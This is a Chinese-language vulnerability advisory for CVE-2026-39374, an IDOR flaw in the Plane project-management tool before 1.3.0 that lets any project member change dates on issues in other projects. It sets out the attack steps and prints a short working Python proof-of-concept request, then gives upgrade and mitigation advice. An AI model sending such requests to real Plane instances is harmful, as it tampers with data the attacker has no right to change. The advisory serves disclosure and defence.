IPBUF安全漏洞报告
English
CVE-2026-39374 CVSS 6.5 中危

CVE-2026-39374 Plane越权修改任意问题日期漏洞

披露日期: 2026-04-07

漏洞信息

漏洞编号
CVE-2026-39374
漏洞类型
越权漏洞 (IDOR)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Plane

相关标签

IDOR越权漏洞Plane权限绕过

漏洞概述

Plane是一款开源项目管理工具。在1.3.0版本之前,其IssueBulkUpdateDateEndpoint接口存在严重的权限校验缺失漏洞。已认证的项目成员(包括管理员和普通成员)可利用该接口,在不检查工作区或项目归属的情况下,直接通过问题ID修改全实例内任意问题的起始日期和目标日期。此漏洞导致攻击者可越权篡改非授权项目的数据,严重影响系统完整性。

技术细节

该漏洞的根源在于Plane后端对IssueBulkUpdateDateEndpoint的处理逻辑存在缺陷。当该端点接收到更新请求时,仅验证了请求者是否为登录用户及其在当前上下文中的成员身份,却未对目标问题(Issue)的所属工作区和项目进行严格的归属校验。具体而言,API直接根据请求体中的Issue ID从数据库中检索对象,而未验证当前用户是否有权访问该ID对应的资源。这构成了典型的IDOR(不安全的直接对象引用)漏洞。攻击者只需遍历或猜测其他项目的Issue ID,并发送特制的HTTP PUT/POST请求,即可修改任意Issue的时间字段。由于CVSS向量显示完整性影响为高,且无需用户交互,该漏洞易于利用,攻击者可借此破坏项目排期、扰乱业务流程或进行数据破坏。

攻击链分析

STEP 1
步骤1:信息收集
攻击者获取目标Plane实例的访问权限,并注册或获取一个普通项目成员账号。
STEP 2
步骤2:认证与会话建立
攻击者使用账号登录系统,获取有效的API认证令牌(Bearer Token)。
STEP 3
步骤3:漏洞利用
攻击者向IssueBulkUpdateDateEndpoint发送请求,在请求体中指定非当前项目或工作区的问题ID(IDOR),并修改其日期字段。
STEP 4
步骤4:数据篡改
服务器由于未校验问题归属,直接执行修改操作,导致目标问题的日期被恶意篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the vulnerable endpoint (example) target_url = "https://target-plane-instance.com/api/v1/workspaces/123/projects/456/issues/bulk-update-date/" # Authentication token (Member or Admin role required) headers = { "Authorization": "Bearer <VALID_MEMBER_TOKEN>", "Content-Type": "application/json" } # Payload targeting an issue ID from a different project/workspace # The vulnerability fails to check if issue "9999" belongs to the current context payload = { "issues": ["9999"], # Arbitrary Issue ID "start_date": "2026-01-01", "target_date": "2026-12-31" } # Send the malicious request response = requests.put(target_url, json=payload, headers=headers) if response.status_code == 200: print("PoC successful: Issue date modified.") else: print(f"Request failed with status: {response.status_code}")

影响范围

Plane < 1.3.0

防御指南

临时缓解措施
建议立即升级至1.3.0或更高版本。若无法立即升级,应严格限制对Plane实例的网络访问,仅允许可信IP访问,并密切监控日志中是否有异常的批量日期修改操作。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表